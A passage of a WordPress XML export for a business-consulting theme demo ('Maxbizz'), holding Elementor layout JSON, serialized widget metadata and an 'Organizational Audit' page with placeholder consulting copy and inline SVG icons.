procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#D92300","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"84e6cfd","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"25b91f9","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9d81515","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"42baa2b","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3ee3642","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5b13621","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8317533","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c212bb7","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"47aaa4f","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"72dea83","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home3.png","id":1701},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"fe0af4f","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"c0a1253","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #d92300;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"94af6c9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4e4cb68","elType":"widget","settings":{"title":"Services","header_size":"h5","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1ebc8a8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d2f32e","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"83881c6","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"fcdefbb","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"82d1d05","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"2301f15","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#D92300","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"86a5b1b","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"cb92309","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"2b9345c","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"798f2b3","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"46c4dc2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"a5a16d3","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"e084289","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"b3e48c6","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"492df2b","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"d978f37","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home3.jpg","id":1705},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"06a6d5d","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"98bd5d7","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a63c787","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#D92300","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"e7107db","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"ab0509d","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"a3b609d","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"774b6cf","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:3;s:22:"typography_font_family";i:1;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1921]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Organizational Audit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/</link>
		<pubDate>Thu, 17 Sep 2020 04:03:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=959</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>how we help</h6>
<h1>Align Costs with Strategy &amp; Focus on Growth</h1>
<a href="#">get in touch</a>
main principles
<h3>Global Reach with Local  Understanding</h3>
In what areas do you provide management consulting?

Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.

In which countries do you provide consulting services?

Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.

How is a consulting project started and organized?

Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.

<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px">
our benefits
<h3>Why Clients Choose Us</h3>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
<g>
<circle cx="119.779" cy="107.869" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="119.779" cy="148.639" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="119.779" cy="189.409" r="10"></circle>
</g>
</g>
<h5><a href="#">Consulting</a></h5>
We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled

<a href="#" class="link-details"> Explore More </a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    